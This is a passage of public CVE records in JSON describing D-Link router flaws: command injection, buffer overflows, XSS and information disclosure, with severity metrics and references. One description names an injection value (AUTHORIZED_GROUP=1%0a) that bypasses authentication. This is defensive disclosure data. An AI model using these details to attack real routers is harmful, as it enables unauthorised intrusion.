{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-17621",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-04T20:33:59.746115Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2023-06-29",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2019-17621"
},
"type": "kev"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-04T20:34:06.306Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-22T18:06:22.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-17621",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf",
"refsource": "MISC",
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"name": "https://www.dlink.com/en/security-bulletin",
"refsource": "MISC",
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147",
"refsource": "CONFIRM",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146",
"refsource": "CONFIRM",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"name": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104",
"refsource": "MISC",
"url": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"name": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9",
"refsource": "MISC",
"url": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"name": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/156054/D-Link-DIR-859-Unauthenticated-Remote-Command-Execution.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-17621",
"datePublished": "2019-12-30T16:09:17.000Z",
"dateReserved": "2019-10-16T00:00:00.000Z",
"dateUpdated": "2025-02-04T20:34:06.306Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-39668
Vulnerability from cvelistv5
Published
2023-08-18 00:00
Modified
2024-10-07 18:33
Severity ?
EPSS score ?
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the inet_ntoa() function.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:18:09.635Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.dlink.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20Buffer%20overflow%202.md"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-868l:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-868l",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "fw_revA_1-12_eu_multi_20170316"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-39668",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T18:33:02.509653Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T18:33:55.359Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the inet_ntoa() function."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-18T02:44:51.443042",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"url": "https://support.dlink.com/"
},
{
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20Buffer%20overflow%202.md"
}
],
"tags": [
"unsupported-when-assigned"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-39668",
"datePublished": "2023-08-18T00:00:00",
"dateReserved": "2023-08-07T00:00:00",
"dateUpdated": "2024-10-07T18:33:55.359Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-39665
Vulnerability from cvelistv5
Published
2023-08-18 00:00
Modified
2024-10-07 18:51
Severity ?
EPSS score ?
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the acStack_50 parameter.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:18:09.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.dlink.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L-bufferoverflow.md"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-868l:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-868l",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "fw_revA_1-12_eu_multi_20170316"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-39665",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T18:51:06.914671Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T18:51:47.152Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the acStack_50 parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-18T02:45:00.188952",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"url": "https://support.dlink.com/"
},
{
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L-bufferoverflow.md"
}
],
"tags": [
"unsupported-when-assigned"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-39665",
"datePublished": "2023-08-18T00:00:00",
"dateReserved": "2023-08-07T00:00:00",
"dateUpdated": "2024-10-07T18:51:47.152Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-39667
Vulnerability from cvelistv5
Published
2023-08-18 00:00
Modified
2024-08-02 18:18
Severity ?
EPSS score ?
Summary
D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function.
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:d-link:dir-868l_firmware:fw_reva_1-12_eu_multi_20170316:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-868l_firmware",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "fw_revA_1-12_eu_multi_20170316"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-39667",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-26T20:11:48.373349Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-26T20:11:55.999Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:18:09.435Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.dlink.com/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20httpd-Improper%20Input%20Validation.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-18T02:44:50.405222",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"url": "https://support.dlink.com/"
},
{
"url": "https://github.com/Davidteeri/Bug-Report/blob/main/D-Link/DIR-868L%20httpd-Improper%20Input%20Validation.md"
}
],
"tags": [
"unsupported-when-assigned"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-39667",
"datePublished": "2023-08-18T00:00:00",
"dateReserved": "2023-08-07T00:00:00",
"dateUpdated": "2024-08-02T18:18:09.435Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20213
Vulnerability from cvelistv5
Published
2020-01-02 01:03
Modified
2024-08-05 02:39
Severity ?
EPSS score ?
Summary
D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:39:09.121Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T01:03:16",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20213",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DIR-859 routers before v1.07b03_beta allow Unauthenticated Information Disclosure via the AUTHORIZED_GROUP=1%0a value, as demonstrated by vpnconfig.php."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f",
"refsource": "MISC",
"url": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"name": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03",
"refsource": "MISC",
"url": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147",
"refsource": "MISC",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146",
"refsource": "MISC",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20213",
"datePublished": "2020-01-02T01:03:16",
"dateReserved": "2020-01-02T00:00:00",
"dateUpdated": "2024-08-05T02:39:09.121Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-6528
Vulnerability from cvelistv5
Published
2018-03-06 20:00
Modified
2024-08-05 06:10
Severity ?
EPSS score ?
Summary
XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:10:10.230Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-02-28T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-03-06T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-6528",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"name": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto",
"refsource": "MISC",
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"name": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-6528",
"datePublished": "2018-03-06T20:00:00",
"dateReserved": "2018-02-02T00:00:00",
"dateUpdated": "2024-08-05T06:10:10.230Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-6530
Vulnerability from cvelistv5
Published
2018-03-06 20:00
Modified
2025-02-04 20:36
Severity ?
EPSS score ?
Summary
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:10:10.174Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2018-6530",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-04T20:36:36.248676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2022-09-08",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2018-6530"
},
"type": "kev"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-04T20:36:49.671Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
